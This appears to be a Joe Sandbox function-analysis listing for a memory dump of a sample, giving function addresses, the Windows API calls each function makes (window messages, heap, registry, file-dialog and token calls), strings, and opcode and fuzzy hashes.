API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: dbb9d06cc6eb8ae54f622b47f6ec3796d6e741abc7f10e2bd534ce7cfc8ae508
Instruction ID: 30751b37c25a6a8f3fb5c793a8fc0a2af1d0f69ab085a63d38405b15afe4feac
Opcode Fuzzy Hash: dbb9d06cc6eb8ae54f622b47f6ec3796d6e741abc7f10e2bd534ce7cfc8ae508
Instruction Fuzzy Hash: 06219175604319EFDF24AF2DD804A9A7BF8AF44728F304A19F9A1D72E0D770A548CB60

Uniqueness

Uniqueness Score: -1.00%

Function 013440AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 012B600E: CreateWindowExW.USER32 ref: 012B604C
Part of subcall function 012B600E: GetStockObject.GDI32(00000011), ref: 012B6060
Part of subcall function 012B600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 012B606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 01344112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0134411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0134412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 01344139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 01344145

Strings

Msctls_Progress32, xrefs: 013440E3

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 419cc53fa2dbd082af3b7f579b066d9efd1674ee8e387536654bc555b53cd24e
Instruction ID: 70be017f29d027d56523743a9fb1c3e42ab121db3eb1fe3844845c71892583e2
Opcode Fuzzy Hash: 419cc53fa2dbd082af3b7f579b066d9efd1674ee8e387536654bc555b53cd24e
Instruction Fuzzy Hash: 0B11B6B115021D7FEF218F64CC85EE77F9DEF08798F014111FA18A2150C676AC21DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 012ED7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 012ED7A3: _free.LIBCMT ref: 012ED7CC

_free.LIBCMT ref: 012ED82D

Part of subcall function 012E29C8: HeapFree.KERNEL32(00000000,00000000), ref: 012E29DE
Part of subcall function 012E29C8: GetLastError.KERNEL32(00000000,?,012ED7D1,00000000,00000000,00000000,00000000,?,012ED7F8,00000000,00000007,00000000,?,012EDBF5,00000000,00000000), ref: 012E29F0

_free.LIBCMT ref: 012ED838
_free.LIBCMT ref: 012ED843
_free.LIBCMT ref: 012ED897
_free.LIBCMT ref: 012ED8A2
_free.LIBCMT ref: 012ED8AD
_free.LIBCMT ref: 012ED8B8

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
Instruction ID: 9fc53d08446739bd88674f1e324eaaac2e23ec423279f61e5ef09850a29507b2
Opcode Fuzzy Hash: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
Instruction Fuzzy Hash: E61163715A0B4DFAD921BFF0CC4EFEB7BDC6F20700FC01825A69AA6090DA79B5054750

Uniqueness

Uniqueness Score: -1.00%

Function 0131DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0131DA74
LoadStringW.USER32(00000000), ref: 0131DA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0131DA91
LoadStringW.USER32(00000000), ref: 0131DA98
MessageBoxW.USER32 ref: 0131DADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0131DAB9

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 8efdb78e0824a2e8b7c4810552bfdcb82efd7b0647fe0bdaa8ba9cacbfc66bf8
Instruction ID: 6b31d96c7eda5a1f75b1b63ad86b80bf10cdbf738d0b1e5b6a9dfd166fea81f7
Opcode Fuzzy Hash: 8efdb78e0824a2e8b7c4810552bfdcb82efd7b0647fe0bdaa8ba9cacbfc66bf8
Instruction Fuzzy Hash: E70162F69002087FF720DBE49D89EE7366CE708305F405495F746E2045EA74AE844B74

Uniqueness

Uniqueness Score: -1.00%

Function 0132096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(0071A3B8,0071A3B8), ref: 0132097B
EnterCriticalSection.KERNEL32(0071A398,00000000), ref: 0132098D
TerminateThread.KERNEL32(00000000,000001F6), ref: 0132099B
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 013209A9
CloseHandle.KERNEL32(00000000), ref: 013209B8
InterlockedExchange.KERNEL32(0071A3B8,000001F6), ref: 013209C8
LeaveCriticalSection.KERNEL32(0071A398), ref: 013209CF

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: bd17f4ddfd0432b62ba05f73bd5869ed0e480d4576e7a124ff1699fcdb20d8be
Instruction ID: febb0dd2f280c0ffa9402dfc2f8a86260ca131f380cfe2a02b85522a928b496f
Opcode Fuzzy Hash: bd17f4ddfd0432b62ba05f73bd5869ed0e480d4576e7a124ff1699fcdb20d8be
Instruction Fuzzy Hash: 19F03131543912BBEB656F94EE8CBD67B39FF05702F402015F202508A4CBB5A465CF90

Uniqueness

Uniqueness Score: -1.00%

Function 012B5D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 012B5D30
GetWindowRect.USER32(?,?), ref: 012B5D71
ScreenToClient.USER32(?,?), ref: 012B5D99
GetClientRect.USER32 ref: 012B5ED7
GetWindowRect.USER32(?,?), ref: 012B5EF8

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 39d108287ff6446d68f9edfa2851d17efca48c88a7d0feed00c136a9405753f6
Instruction ID: 0b0e3897062f22c12c61769b6def5899293eeb94fd1db0e9e5ec1ff5242786e0
Opcode Fuzzy Hash: 39d108287ff6446d68f9edfa2851d17efca48c88a7d0feed00c136a9405753f6
Instruction Fuzzy Hash: 23B19B34A2078ADBDB10DFA8C4817EEBBF1FF48310F04851AEAA9D7250DB74A941CB54

Uniqueness

Uniqueness Score: -1.00%

Function 012E01B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 012E00BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012E00D6
__allrem.LIBCMT ref: 012E00ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012E010B
__allrem.LIBCMT ref: 012E0122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012E0140

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: 4c2926d451c5a6bfebb195b5738a6591f5bfc26ce50b319608484f63326dfcc0
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: 54810672B207079FE7209F6CCC45B6AB7E9AF51324F54452EF611DA2C0E7B0D9028B98

Uniqueness

Uniqueness Score: -1.00%

Function 0133BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 012B9CB3: _wcslen.LIBCMT ref: 012B9CBD

Part of subcall function 0133C998: CharUpperBuffW.USER32(?,?), ref: 0133C9B5
Part of subcall function 0133C998: _wcslen.LIBCMT ref: 0133C9F1
Part of subcall function 0133C998: _wcslen.LIBCMT ref: 0133CA68
Part of subcall function 0133C998: _wcslen.LIBCMT ref: 0133CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0133BCCA
RegOpenKeyExW.ADVAPI32 ref: 0133BD25
RegCloseKey.ADVAPI32(00000000), ref: 0133BD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0133BD99
RegCloseKey.ADVAPI32(?), ref: 0133BDF3
RegCloseKey.ADVAPI32(?), ref: 0133BDFF

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: a796142a88dbbda1746faf25746c0fc63deefedcffa95b259f2c63f66f29d20b
Instruction ID: c8e3635eae327bb5ab59a024326c9e00f5c0ca50e7d388d789b7c2f05d4b0660
Opcode Fuzzy Hash: a796142a88dbbda1746faf25746c0fc63deefedcffa95b259f2c63f66f29d20b
Instruction Fuzzy Hash: 08819E70218241AFD714DF28C884E6ABBE9FF84348F14895DF5594B2A1DB31ED45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0130F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 0130F7B9
SysAllocString.OLEAUT32(00000001), ref: 0130F860
VariantCopy.OLEAUT32(0130FA64,00000000), ref: 0130F889
VariantClear.OLEAUT32(0130FA64), ref: 0130F8AD
VariantCopy.OLEAUT32(0130FA64,00000000), ref: 0130F8B1
VariantClear.OLEAUT32(?), ref: 0130F8BB

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 8f0e27ffc7234ea4ea649f758c57fc7f143b6a6ad5cd7147ba3513715e6acf33
Instruction ID: 377ed96d52dcb8fc787f7489c02f8e77fe484f95ca17cf6aaeef7cc5b2ed4ae5
Opcode Fuzzy Hash: 8f0e27ffc7234ea4ea649f758c57fc7f143b6a6ad5cd7147ba3513715e6acf33
Instruction Fuzzy Hash: FA512631610315BBCF32AB69D4A4B79B3ECEF55718F14944AE901DF2D4DB709840CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0132910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 012B7620: _wcslen.LIBCMT ref: 012B7625

Part of subcall function 012B6B57: _wcslen.LIBCMT ref: 012B6B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 013294E5
_wcslen.LIBCMT ref: 01329506
_wcslen.LIBCMT ref: 0132952D
GetSaveFileNameW.COMDLG32(00000058), ref: 01329585

Strings

X, xrefs: 01329412

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: f46d0dc52b7d442863d7d44990603739ce1c9f02c974384ae7cb84c85797e04e
Instruction ID: 6bc039051053ee0c3ad665feb04b0f8be5c3f0380d83a61c714f3674b400f7b1
Opcode Fuzzy Hash: f46d0dc52b7d442863d7d44990603739ce1c9f02c974384ae7cb84c85797e04e
Instruction Fuzzy Hash: 87E1D531614361CFD724EF24C480BAAB7E4BF95358F14856DE9899B2A1DB30ED44CB92

Uniqueness

Uniqueness Score: -1.00%

Function 012C920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 012C9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 012C9BB2

BeginPaint.USER32(?,?), ref: 012C9241
GetWindowRect.USER32(?,?), ref: 012C92A5
ScreenToClient.USER32(?,?), ref: 012C92C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 012C92D3
EndPaint.USER32(?,?), ref: 012C9321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 013071EA

Part of subcall function 012C9339: BeginPath.GDI32(00000000), ref: 012C9357

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 21a1ed03bf9c81491f9e87121844215e3709cb7a072528483fa272d7115aef6b
Instruction ID: 6ed358138501d2a623ad01add698ff0099cbe055e3c9e669e5f66592ab79dd8d
Opcode Fuzzy Hash: 21a1ed03bf9c81491f9e87121844215e3709cb7a072528483fa272d7115aef6b
Instruction Fuzzy Hash: FD419F31115301AFDB21DF28C885FBA7BE9EF45728F04066DFAA5871E1C771A885CB62

Uniqueness

Uniqueness Score: -1.00%

Function 013207EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0132080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 01320847
EnterCriticalSection.KERNEL32(?), ref: 01320863
LeaveCriticalSection.KERNEL32(?), ref: 013208DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 013208F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 01320921

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: c7f382b87515196fdb3748fe219973d3199ae9b05786a22d11ddb415eb0fbb41
Instruction ID: 7e9ac655fb27c535d873f7000effb167eb89c1fe29e5c94c50bec9e6a995ac5b
Opcode Fuzzy Hash: c7f382b87515196fdb3748fe219973d3199ae9b05786a22d11ddb415eb0fbb41
Instruction Fuzzy Hash: DB418F71A00205EFDF15AF54DC84A6A7BB9FF04704F1440A9ED049A29ADB70EE54DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 013322DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 013322E8

Part of subcall function 0132E4EC: GetWindowRect.USER32(?,?), ref: 0132E504

GetDesktopWindow.USER32 ref: 01332312
GetWindowRect.USER32(00000000), ref: 01332319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 01332355
GetCursorPos.USER32(?), ref: 01332381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 013323DF

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: db7ecd2539e45da066ad1cff537ace1fca2a51292653a3f921e99041d3a3341d
Instruction ID: 23239e1878fce9bae9002632c6d9dc7dab8c715188d4f7dd5fa4af830b15bfb8
Opcode Fuzzy Hash: db7ecd2539e45da066ad1cff537ace1fca2a51292653a3f921e99041d3a3341d
Instruction Fuzzy Hash: 6831DE72505305AFD721DF18C848B9BBBAEFFC4328F000919F98597181DB31EA08CB96

Uniqueness

Uniqueness Score: -1.00%

Function 01314C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 01314C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 01314CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 01314CEA
_wcslen.LIBCMT ref: 01314D08
CharUpperBuffW.USER32(00000000,00000000), ref: 01314D10
_wcsstr.LIBVCRUNTIME ref: 01314D1A

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 8ca9a2bbcaf6b38a4c2ae222584946db929637496178ccb280fd8a56a80f6640
Instruction ID: 017538263c8e256fb4c4f89f4ea79192d7714d5d808695f573299a38afa42f95
Opcode Fuzzy Hash: 8ca9a2bbcaf6b38a4c2ae222584946db929637496178ccb280fd8a56a80f6640
Instruction Fuzzy Hash: 4A212975204205BBEF295B39EC08E7BBBDCDF45B64F04802DF905CA186EF65D80087A0

Uniqueness

Uniqueness Score: -1.00%

Function 0132581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 012B3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,012B3A97,?,?,012B2E7F,?,?,?,00000000), ref: 012B3AC2

_wcslen.LIBCMT ref: 0132587B
CoInitialize.OLE32(00000000), ref: 01325995
CoCreateInstance.OLE32(0134FCF8,00000000,00000001,0134FB68,?), ref: 013259AE
CoUninitialize.OLE32 ref: 013259CC

Strings

.lnk, xrefs: 01325876, 013258C1, 01325985

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 222a4e0f7c56a0a6d569452449c4123b08264e34dce6c1744bebcafbea619074
Instruction ID: 3ee2f5d9e2fd61688a3461f88bdfb296950ff6940405e918419b360d65da98c0
Opcode Fuzzy Hash: 222a4e0f7c56a0a6d569452449c4123b08264e34dce6c1744bebcafbea619074
Instruction Fuzzy Hash: E3D176716043119FC714EF28C4809AABBE5FF89718F14885DF8899B361DB31ED45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0131175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 01310FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 01310FCA
Part of subcall function 01310FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 01310FD6
Part of subcall function 01310FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 01310FE5
Part of subcall function 01310FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 01310FEC
Part of subcall function 01310FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 01311002

GetLengthSid.ADVAPI32(?,00000000,01311335), ref: 013117AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 013117BA
HeapAlloc.KERNEL32(00000000), ref: 013117C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 013117DA
GetProcessHeap.KERNEL32(00000000,00000000,01311335), ref: 013117EE
HeapFree.KERNEL32(00000000), ref: 013117F5

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 43dd194544e46350e08c9b9b12ff5b57a86a74e95abd10572f31119f447fd3f0
Instruction ID: 2acbc3d5b7001abdb95d8b3d011b9aa2c4474ef00f0e6fda35367ce295c0a47d
Opcode Fuzzy Hash: 43dd194544e46350e08c9b9b12ff5b57a86a74e95abd10572f31119f447fd3f0
Instruction Fuzzy Hash: B111BE35502205FFEB289FA8CC49BEE7BADEB42359F144018F64197208CB36A944CB60

Uniqueness

Uniqueness Score: -1.00%

Function 013114CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 013114FF
OpenProcessToken.ADVAPI32(00000000), ref: 01311506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 01311515
